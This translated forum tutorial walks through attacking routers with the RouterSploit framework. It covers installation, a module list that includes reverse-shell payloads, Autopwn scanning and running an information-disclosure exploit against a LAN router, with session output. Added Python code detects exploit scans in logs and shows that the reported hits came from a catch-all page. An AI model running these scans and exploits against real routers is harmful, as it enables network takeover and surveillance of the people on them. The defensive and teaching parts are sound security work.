Attacking routers with RouterSploit

Routers are the core of any network connection, yet ordinary users pay little attention to their security configuration. Outdated device firmware, weak default passwords and other configuration problems are all exploited by attackers. These weaknesses are so easy to abuse that building automated tools to exploit them is trivial.

In this article I describe how to use RouterSploit, an automated router exploitation framework.

Router exploitation basics

Router exploitation usually starts by getting onto the network (for example by breaking the router's Wi-Fi security), then bypassing the administrative login page to reach administrative functions. A skilled attacker then goes after the router's firmware, "rootkitting" it: a custom firmware image is loaded that provides advanced malicious functionality.

Depending on the attacker's goals, an attack can include monitoring users and connected devices, injecting malware through the web interface to exploit connected devices, running targeted spear-phishing, and routing illegal traffic through the exploited router in support of criminal activity.

Cherry Blossom, a router exploitation tool

Government agencies such as the NSA and CIA have stockpiled router vulnerabilities. The Shadow Brokers leaked NSA tooling, including the Windows SMB exploit that WannaCry was built on, and the CIA's Cherry Blossom documentation was later published by WikiLeaks. Tools like Cherry Blossom may well become the model for mainstream router exploitation.

These NSA and CIA tools can take control of the entire local network behind an infected router, turning it into an advanced wireless surveillance device.

Cherry Blossom is a rootkitting framework in which routers are exploited automatically and converted into "flytraps". A flytrap is a router that has been loaded with special firmware that prevents the user from updating or replacing it.

The Cherry Blossom tooling can control many flytraps, which act as surveillance devices located in the home or target network.

Flytraps "beacon" back to a command-and-control server called "Cherryweb", and operators assign them "tasks" over an encrypted VPN tunnel. Advanced modules such as "Windex" can run malware attacks against any connected target, turning a flytrap into an advanced remote spying platform that can be controlled from anywhere.

Figure: Cherry Blossom's interface showing the tasks to be sent to flytrap devices, including shellcode, reconnaissance scripts and exploit code.

Router attacks in the wild

Beyond the espionage tools the CIA cares about, exploitable routers and IoT devices are prime targets because of their routing capability. RouterSploit, the tool used here, not only attacks routers but also works against IP cameras and other connected devices.

Whereas the CIA used VPN links to proxy and control traffic between its servers, criminals use such devices to proxy malicious traffic and evade detection. Networks of compromised routers and IoT devices are in fact sold on the black market as proxy infrastructure for hiding credit-card fraud, darknet trading, DDoS attacks and other illegal activity.

Getting started with router attacks

If you gain control of the router, you have full access to the network. You can watch the target devices' traffic and route it wherever you want, or forward ports for remote access.

A beginner only has to run RouterSploit's Autopwn scanner: it automatically tests a whole series of exploits against the target IP address.

What is RouterSploit?

RouterSploit is a framework written in Python that automates most router-related exploitation tasks. It is modelled on Metasploit, so anyone used to the Metasploit framework will find its commands familiar. It includes scanning and exploitation modules and can be installed on Kali Linux.

Once connected to the target network, a scan shows whether the router can be exploited easily through the framework. I'll use the Autopwn feature to quickly identify vulnerabilities on the router and on connected devices.

Installation

RouterSploit can be installed on Kali Linux, and also runs on a Kali Raspberry Pi, on macOS or Mac OS X, on Windows, and even on a rooted Android phone. First we need to take care of a few dependencies and make sure Python is installed.

Step 1: Install Python and dependencies

Make sure Python is installed, and that you also have the following packages:

- Python 3 (with pip)
- requests
- paramiko
- beautifulsoup4
- pysnmp
- gnureadline (macOS / Mac OS X only)

On Debian-based systems such as Kali, install pip with apt-get and the Python packages with pip (these are pip package names, not apt package names, so apt-get install requests paramiko ... would fail):

apt-get install python3-pip
python3 -m pip install requests paramiko beautifulsoup4 pysnmp

Step 2: Install RouterSploit on Kali or Mac

To install on Kali Linux, open a terminal window and type the following commands (the requirements.txt step pulls in the dependencies from Step 1):

git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

On macOS or Mac OS X the procedure is similar. In a terminal window, type:

git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m ensurepip
python3 -m pip install -r requirements.txt

(The original steps used sudo easy_install pip; easy_install has since been removed from setuptools, and python3 -m ensurepip installs pip if it is missing.)

Step 3: Run RouterSploit

For the first run, connect the computer to the network of the router you want to scan, change into the RouterSploit directory and start it:

cd ~/routersploit
sudo python3 rsf.py

The RouterSploit interface is styled after the Metasploit framework.

The command line takes simple commands to scan and exploit routers. You can list everything RouterSploit offers by typing:

show all

The output lists a large number of credential, exploit, payload and scanner modules:

creds/generic/: snmp_bruteforce, telnet_default, ssh_default, ftp_bruteforce, http_basic_digest_bruteforce, ftp_default, http_basic_digest_default, ssh_bruteforce, telnet_bruteforce

creds/routers/<vendor>/ssh_default_creds, telnet_default_creds, ftp_default_creds for: ipfire, bhu, linksys, technicolor, asus, billion, zte, ubiquiti, asmax, huawei, tplink, netgear, mikrotik, movistar, dlink, juniper, comtrend, fortinet, belkin, netsys, zyxel, thomson, netcore, cisco
plus creds/routers/asmax/webinterface_http_auth_default_creds, creds/routers/mikrotik/api_ros_default_creds, creds/routers/pfsense/ssh_default_creds, creds/routers/pfsense/webinterface_http_form_default_creds

creds/cameras/<vendor>/ssh_default_creds, telnet_default_creds, ftp_default_creds for: grandstream, basler, avtech, vacron, acti, sentry360, siemens, american_dynamics, videoiq, jvc, speco, iqinvision, avigilon, canon, hikvision, dlink, honeywell, samsung, axis, arecont, brickcom, mobotix, geovision, stardot, cisco
plus webinterface_http_form_default_creds for basler and acti, and webinterface_http_auth_default_creds for canon, axis and brickcom

payloads/perl/: bind_tcp, reverse_tcp
payloads/python/: bind_tcp, reverse_tcp, bind_udp, reverse_udp
payloads/mipsbe/: bind_tcp, reverse_tcp
payloads/armle/: bind_tcp, reverse_tcp
payloads/x86/: bind_tcp, reverse_tcp
payloads/php/: bind_tcp, reverse_tcp
payloads/cmd/: php_reverse_tcp, python_reverse_tcp, python_bind_tcp, perl_reverse_tcp, netcat_reverse_tcp, awk_reverse_tcp, awk_bind_tcp, bash_reverse_tcp, php_bind_tcp, awk_bind_udp, netcat_bind_tcp, perl_bind_tcp, python_reverse_udp, python_bind_udp
payloads/x64/: bind_tcp, reverse_tcp
payloads/mipsle/: bind_tcp, reverse_tcp

scanners/: autopwn, misc/misc_scan, routers/router_scan, cameras/camera_scan

exploits/generic/: shellshock, ssh_auth_keys, heartbleed
exploits/misc/: asus/b1m_projector_rce, wepresent/wipg1000_rce, miele/pg8528_path_traversal
exploits/routers/ipfire/: ipfire_oinkcode_rce, ipfire_proxy_rce, ipfire_shellshock
exploits/routers/2wire/: gateway_auth_bypass, 4011g_5012nv_path_traversal
exploits/routers/bhu/: bhu_urouter_rce
exploits/routers/linksys/: 1500_2500_rce, smartwifi_password_disclosure, wrt100_110_rce, wap54gv3_rce
exploits/routers/technicolor/: tg784_authbypass, tc7200_password_disclosure_v2, dwg855_authbypass, tc7200_password_disclosure
exploits/routers/asus/: infosvr_backdoor_rce, rt_n16_password_disclosure
exploits/routers/billion/: billion_5200w_rce, billion_7700nr4_password_disclosure
exploits/routers/zte/: f460_f660_backdoor, zxv10_rce
exploits/routers/ubiquiti/: airos_6_x
exploits/routers/asmax/: ar_1004g_password_disclosure, ar_804_gu_rce
exploits/routers/huawei/: hg520_info_dislosure, hg866_password_change, hg530_hg520b_password_disclosure, e5331_mifi_info_disclosure
exploits/routers/tplink/: wdr740nd_wdr740n_backdoor, archer_c2_c20i_rce, wdr740nd_wdr740n_path_traversal, wdr842nd_wdr842n_configure_disclosure
exploits/routers/netgear/: jnr1010_path_traversal, n300_auth_bypass, multi_password_disclosure-2017-5521, dgn2200_dnslookup_cgi_rce, prosafe_rce, r7000_r6400_rce, multi_rce, wnr500_612v3_jnr1010_2010_path_traversal, dgn2200_ping_cgi_rce
exploits/routers/mikrotik/: routeros_jailbreak
exploits/routers/movistar/: adsl_router_bhs_rta_path_traversal
exploits/routers/dlink/: dsp_w110_rce, dgs_1510_add_user, dir_645_815_rce, dir_815_850l_rce, dir_300_320_615_auth_bypass, dir_645_password_disclosure, dir_850l_creds_disclosure, dvg_n5402sp_path_traversal, dsl_2640b_dns_change, dcs_930l_auth_rce, dir_825_path_traversal, multi_hedwig_cgi_exec, dns_320l_327l_rce, dsl_2730_2750_path_traversal, dsl_2750b_info_disclosure, dir_300_600_rce, dwl_3200ap_password_disclosure, dsl_2740r_dns_change, dir_8xx_password_disclosure, dwr_932b_backdoor, dsl_2730b_2780b_526b_dns_change, dwr_932_info_disclosure, dir_300_320_600_615_info_disclosure, dsl_2750b_rce, multi_hnap_rce, dir_300_645_815_upnp_rce
exploits/routers/3com/: ap8760_password_disclosure, imc_path_traversal, officeconnect_rce, officeconnect_info_disclosure, imc_info_disclosure
exploits/routers/comtrend/: ct_5361t_password_disclosure
exploits/routers/fortinet/: fortigate_os_backdoor
exploits/routers/multi/: rom0, tcp_32764_rce, misfortune_cookie, tcp_32764_info_disclosure, gpon_home_gateway_rce
exploits/routers/belkin/: g_plus_info_disclosure, play_max_prce, n150_path_traversal, n750_rce, g_n150_password_disclosure, auth_bypass
exploits/routers/netsys/: multi_rce
exploits/routers/shuttle/: 915wm_dns_change
exploits/routers/zyxel/: d1000_rce, p660hn_t_v2_rce, d1000_wifi_password_disclosure, zywall_usg_extract_hashes, p660hn_t_v1_rce
exploits/routers/thomson/: twg850_password_disclosure, twg849_info_disclosure
exploits/routers/netcore/: udp_53413_rce
exploits/routers/cisco/: secure_acs_bypass, catalyst_2960_rocem, ucs_manager_rce, unified_multi_path_traversal, firepower_management60_path_traversal, firepower_management60_rce, video_surv_path_traversal, dpc2420_info_disclosure, ios_http_authorization_bypass, ucm_info_disclosure
exploits/cameras/: grandstream/gxv3611hd_ip_camera_sqli, grandstream/gxv3611hd_ip_camera_backdoor, mvpower/dvr_jaws_rce, siemens/cvms2025_credentials_disclosure, avigilon/videoiq_camera_path_traversal, xiongmai/uc_httpd_path_traversal, dlink/dcs_930l_932l_auth_bypass, honeywell/hicc_1100pt_password_disclosure, brickcom/corp_network_cameras_conf_disclosure, brickcom/users_cgi_creds_disclosure, multi/P2P_wificam_credential_disclosure, multi/dvr_creds_disclosure, multi/jvc_vanderbilt_honeywell_path_traversal, multi/netwave_ip_camera_information_disclosure, multi/P2P_wificam_rce

generic/bluetooth/: btle_enumerate, btle_scan, btle_write
generic/upnp/: ssdp_msearch

rsf >

Autopwn first scans the target router: it runs the check of every exploit module against the target and, when the scan finishes, returns a list of the modules that appear to apply.

Step 4: Scan the target

We'll use the Autopwn scanner to find any exploits that apply to our target. Find the router's IP address and note it down. In most cases the default gateway is 192.168.0.1 or 192.168.1.1, but that can be changed; if you don't know it, read the default gateway from the routing table (ip route on Linux) or find it with Fing or an ARP scan.

After starting RouterSploit, type the following commands to enter the Autopwn module:

use scanners/autopwn
show options

This is very much like Metasploit. Type use followed by the module you want, show options to display the module's variables, set to assign any variable shown by show options, and finally run to execute the module. To leave a module and return to the main prompt, type back (exit quits the framework).

rsf > use scanners/autopwn
rsf (AutoPwn) > show options

Target options:

   Name         Current settings     Description
   ----         ----------------     -----------
   target                            Target IPv4 or IPv6 address

Module options:

   Name         Current settings     Description
   ----         ----------------     -----------
   http_port    80                   Target Web Interface Port
   http_ssl     false                HTTPS enabled: true/false
   ftp_port     21                   Target FTP port (default: 21)
   ftp_ssl      false                FTPS enabled: true/false
   ssh_port     22                   Target SSH port (default: 22)
   telnet_port  23                   Target Telnet port (default: 23)
   threads      8

In this case we set target to the router's IP address. Type set target followed by the router's IP and press Enter. Finally, type run to start the scan.

rsf (AutoPwn) > set target 10.11.0.4
[+] {target: 10.11.0.4}
rsf (AutoPwn) > run
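Seen from the router's side, an Autopwn run is one client requesting dozens of vendor-specific paths within a few seconds, most of which do not exist on any given model and so return 404. The following is an added example, my own code rather than anything from RouterSploit or the original article, that runs a simple detection over web-server access-log lines: a per-client sliding window that raises one alert when a client has requested at least eight distinct paths within a minute and at least half of those requests were 404s. The log lines are constructed for the example; of the probed paths only /app_sta.stm comes from this page, the others are assumptions chosen to resemble the modules listed above.

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime
from typing import Deque, Dict, Iterable, List, Optional, Set, Tuple

# Common Log Format as written by many embedded web servers (assumption: the
# router or a proxy in front of it logs in this format; adjust LOG_RE otherwise).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


@dataclass
class ScanAlert:
    ip: str
    at: datetime
    distinct_paths: int   # distinct paths in the window when the alert fired
    not_found: int        # requests in that window that got a 404
    requests: int         # total requests in that window


def parse_line(line: str) -> Optional[Tuple[str, datetime, str, int]]:
    """Return (client ip, timestamp, path without query string, status) or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], TS_FMT)
    return m["ip"], ts, m["path"].split("?", 1)[0], int(m["status"])


def detect_scans(lines: Iterable[str], window_s: int = 60,
                 min_paths: int = 8, min_404_ratio: float = 0.5) -> List[ScanAlert]:
    """Per-client sliding window. An exploit sweep (Autopwn or any similar
    scanner) shows up as many distinct paths in a short time, mostly 404
    because they belong to other vendors' firmware. One alert per client."""
    windows: Dict[str, Deque[Tuple[datetime, str, int]]] = defaultdict(deque)
    alerted: Set[str] = set()
    alerts: List[ScanAlert] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not CLF; a real deployment would count parse failures
        ip, ts, path, status = rec
        win = windows[ip]
        win.append((ts, path, status))
        while win and (ts - win[0][0]).total_seconds() > window_s:
            win.popleft()
        if ip in alerted:
            continue
        distinct = {p for _, p, _ in win}
        n404 = sum(1 for _, _, s in win if s == 404)
        if len(distinct) >= min_paths and n404 / len(win) >= min_404_ratio:
            alerted.add(ip)
            alerts.append(ScanAlert(ip, ts, len(distinct), n404, len(win)))
    return alerts


# Constructed log: 10.11.0.23 is an administrator browsing the web UI;
# 10.11.0.9 sweeps vendor-specific paths the way an exploit scanner does.
SAMPLE_LOG = [
    '10.11.0.23 - - [12/Jun/2018:10:14:02 +0800] "GET / HTTP/1.1" 200 1843',
    '10.11.0.23 - - [12/Jun/2018:10:14:03 +0800] "GET /login.htm HTTP/1.1" 200 2210',
    '10.11.0.23 - - [12/Jun/2018:10:14:03 +0800] "GET /favicon.ico HTTP/1.1" 404 162',
    '10.11.0.23 - - [12/Jun/2018:10:14:20 +0800] "POST /login.cgi HTTP/1.1" 200 512',
    '10.11.0.23 - - [12/Jun/2018:10:14:21 +0800] "GET /status.htm HTTP/1.1" 200 3120',
    '10.11.0.9 - - [12/Jun/2018:10:15:01 +0800] "GET / HTTP/1.1" 200 1843',
    '10.11.0.9 - - [12/Jun/2018:10:15:01 +0800] "GET /login.htm HTTP/1.1" 200 2210',
    '10.11.0.9 - - [12/Jun/2018:10:15:02 +0800] "GET /app_sta.stm HTTP/1.1" 404 162',
    '10.11.0.9 - - [12/Jun/2018:10:15:02 +0800] "GET /HNAP1/ HTTP/1.1" 404 162',
    '10.11.0.9 - - [12/Jun/2018:10:15:02 +0800] "GET /hedwig.cgi HTTP/1.1" 404 162',
    '10.11.0.9 - - [12/Jun/2018:10:15:03 +0800] "GET /rom-0 HTTP/1.1" 404 162',
    '10.11.0.9 - - [12/Jun/2018:10:15:03 +0800] "GET /dnslookup.cgi?host=a HTTP/1.1" 404 162',
    '10.11.0.9 - - [12/Jun/2018:10:15:03 +0800] "GET /getcfg.php HTTP/1.1" 404 162',
    '10.11.0.9 - - [12/Jun/2018:10:15:04 +0800] "POST /ping.cgi HTTP/1.1" 404 162',
    '10.11.0.9 - - [12/Jun/2018:10:15:04 +0800] "GET /config.dat HTTP/1.1" 404 162',
    '10.11.0.23 - - [12/Jun/2018:10:15:40 +0800] "GET /wireless.htm HTTP/1.1" 200 2980',
    '10.11.0.23 - - [12/Jun/2018:10:15:41 +0800] "GET /logo.png HTTP/1.1" 200 4012',
]

if __name__ == "__main__":
    for a in detect_scans(SAMPLE_LOG):
        print(f"{a.at.isoformat()} scan from {a.ip}: {a.distinct_paths} distinct paths, "
              f"{a.not_found}/{a.requests} requests returned 404")
```

The thresholds are a starting point, not a rule: a busy admin UI that loads many assets at once can hit eight distinct paths, which is why the 404 ratio is required as well. Many consumer routers keep no access log at all, so in practice this runs on a syslog target, a reverse proxy or an IDS sitting in front of the management interface.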

Step 5: Select and configure an exploit

When the scan completes, it shows the list of exploits it found, from which we can pick the one that best fits our needs. Here the scan reports a long list. Note, though, that the "vulnerable" entries span 3Com, D-Link, IPFire, Linksys, Netgear and ZyXEL, and no single router runs all of that firmware. Autopwn's checks are mostly simple HTTP probes, so a target that answers every request with a 200 page passes many of them at once; each hit needs to be confirmed with the module's own check before it is believed.

[*] Elapsed time: 9 seconds
[*] Could not verify exploitability:
 - exploits/routers/billion/5200w_rce
 - exploits/routers/cisco/catalyst_2960_rocem
 - exploits/routers/cisco/secure_acs_bypass
 - exploits/routers/dlink/dir_815_850l_rce
 - exploits/routers/dlink/dsl_2640b_dns_change
 - exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
 - exploits/routers/dlink/dsl_2740r_dns_change
 - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
 - exploits/routers/shuttle/915wm_dns_change

[*] Device is vulnerable:
 - exploits/routers/3com/3cradsl72_info_disclosure
 - exploits/routers/3com/officeconnect_rce
 - exploits/routers/dlink/dcs_930l_auth_rce
 - exploits/routers/dlink/dir_300_600_rce
 - exploits/routers/ipfire/ipfire_proxy_rce
 - exploits/routers/linksys/1500_2500_rce
 - exploits/routers/netgear/prosafe_rce
 - exploits/routers/zyxel/zywall_usg_extract_hashes
 - exploits/routers/dlink/dcs_930l_932l_auth_bypass

rsf (AutoPwn) >
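A list that spans this many unrelated vendors is the signature of a catch-all web server: many path-based checks only fetch a vendor-specific URL and treat an HTTP 200 as a hit, so a device or captive portal that serves the same page for every URL satisfies all of them. The added example below is my own code, not RouterSploit's, and the path/marker pairs are assumptions modelled on the /app_sta.stm request shown in Step 6. It contrasts a naive status-only check with a verification that first fetches random paths that cannot exist, and only reports "vulnerable" when the exploit path's response differs from that generic page and contains the expected marker. The three target stand-ins are constructed.

```python
import secrets
from typing import Callable, Dict, Optional, Tuple

# An HTTP GET stand-in: path -> (status, body). In a real run this would wrap
# requests.get() against the target; here it is pluggable so the logic runs
# offline against constructed devices.
Fetch = Callable[[str], Tuple[int, str]]

# Path/marker pairs in the style of RouterSploit's path-based checks. Only
# "/app_sta.stm" comes from the 3Com session on this page; the marker strings
# and the second entry are assumptions for illustration.
CHECKS: Dict[str, Tuple[str, str]] = {
    "3com/3cradsl72_info_disclosure": ("/app_sta.stm", "app_sta"),
    "example/config_disclosure": ("/config.dat", "admin_password="),
}


def naive_check(fetch: Fetch, module: str) -> bool:
    """The kind of check that yields long cross-vendor 'vulnerable' lists:
    any HTTP 200 on the vendor-specific path counts as a hit."""
    path, _ = CHECKS[module]
    status, _ = fetch(path)
    return status == 200


def catch_all_page(fetch: Fetch) -> Optional[str]:
    """Fetch two random paths that cannot exist on the device. A real device
    answers 404 (or drops the connection); a catch-all server or captive
    portal returns 200 with the same page for both. Return that page, or None."""
    bodies = []
    for _ in range(2):
        status, body = fetch("/" + secrets.token_hex(8) + ".stm")
        if status != 200 or not body.strip():
            return None
        bodies.append(body)
    return bodies[0] if bodies[0] == bodies[1] else None


def verify(fetch: Fetch, module: str) -> str:
    """Re-verify an Autopwn hit before trusting it."""
    path, marker = CHECKS[module]
    status, body = fetch(path)
    if status != 200:
        return "not vulnerable"
    generic = catch_all_page(fetch)
    if generic is not None and body == generic:
        return "false positive (catch-all response)"
    if marker not in body:
        return "unverified (200 without expected marker)"
    return "vulnerable"


def make_device(pages: Dict[str, str], catch_all: Optional[str] = None) -> Fetch:
    """Constructed stand-in for a target: known pages answer 200, anything else
    answers 404, unless catch_all is set, in which case every path gets it."""
    def fetch(path: str) -> Tuple[int, str]:
        if path in pages:
            return 200, pages[path]
        if catch_all is not None:
            return 200, catch_all
        return 404, ""
    return fetch


# Constructed targets: a device with the disclosure, a patched one, and a
# catch-all server like the one the scan output above suggests.
GENERIC_PAGE = "<!doctype html><html><!-- We are hiring software developers! --></html>"
vulnerable_router = make_device({"/app_sta.stm": "app_sta: wan_ip=203.0.113.7 serial=XX0000"})
patched_router = make_device({})
catch_all_server = make_device({}, catch_all=GENERIC_PAGE)

if __name__ == "__main__":
    module = "3com/3cradsl72_info_disclosure"
    for name, dev in [("vulnerable", vulnerable_router), ("patched", patched_router),
                      ("catch-all", catch_all_server)]:
        print(f"{name:10s} naive={naive_check(dev, module)!s:5s} verified={verify(dev, module)}")
```

Against the catch-all target the naive check says True while verify() reports a false positive; against the genuinely affected device both agree. The same baseline request is worth running once per target before reading any Autopwn list.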

Start with something simple, such as an information disclosure. To use this exploit, enter:

use exploits/routers/3com/3cradsl72_info_disclosure
show options

A list of variables appears; set the target and verify it by typing:

set target <target router IP>
check

Setting the target IP:

rsf (AutoPwn) > use exploits/routers/3com/3cradsl72_info_disclosure
rsf (3Com 3CRADSL72 Info Disclosure) > show options

Target options:

   Name         Current settings     Description
   ----         ----------------     -----------
   target                            Target IPv4 or IPv6 address

rsf (3Com 3CRADSL72 Info Disclosure) > set target 10.11.0.4
[+] {target: 10.11.0.4}
rsf (3Com 3CRADSL72 Info Disclosure) > check
/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/... InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
[+] Target is vulnerable
rsf (3Com 3CRADSL72 Info Disclosure) >

Step 6: Run the exploit

Type run to launch the attack:

rsf (3Com 3CRADSL72 Info Disclosure) > run
[*] Running module...
[*] Sending request to download sensitive information
/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/... InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
[+] Exploit success
[*] Reading /app_sta.stm file
<!doctype html>
<html >
<!-- _#####____####___######___####___####___##______######__#####___##__##__##__##__##______##_____##______##______##______##__##__#####___######__####_____####___####___##______####____#####___##______##__##__##__________##_____##__##______##______##__##__##______##__##__######___####___####___######__######__##__##_ We are hiring software developers! -->
<head>
  <link rel="manifest" href="/public/manifest.json.htm">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale
(output truncated)

If the exploit succeeds you should see the device's internal configuration, which may leak user names and passwords, default passwords, the device serial number and other settings that allow the router to be compromised further. Other modules inject code remotely or retrieve the router password directly. Note, however, that what came back in the session above is an ordinary HTML landing page rather than a 3Com status file: "Exploit success" here only means the request for /app_sta.stm got a 200, the same pattern that produced the cross-vendor list in Step 5. Read the returned data before treating it as a disclosure.

Kanxue ID: hackerbirder

This article was written by hackerbirder for the Kanxue forum (看雪论坛).

Please credit the Kanxue community when reposting.
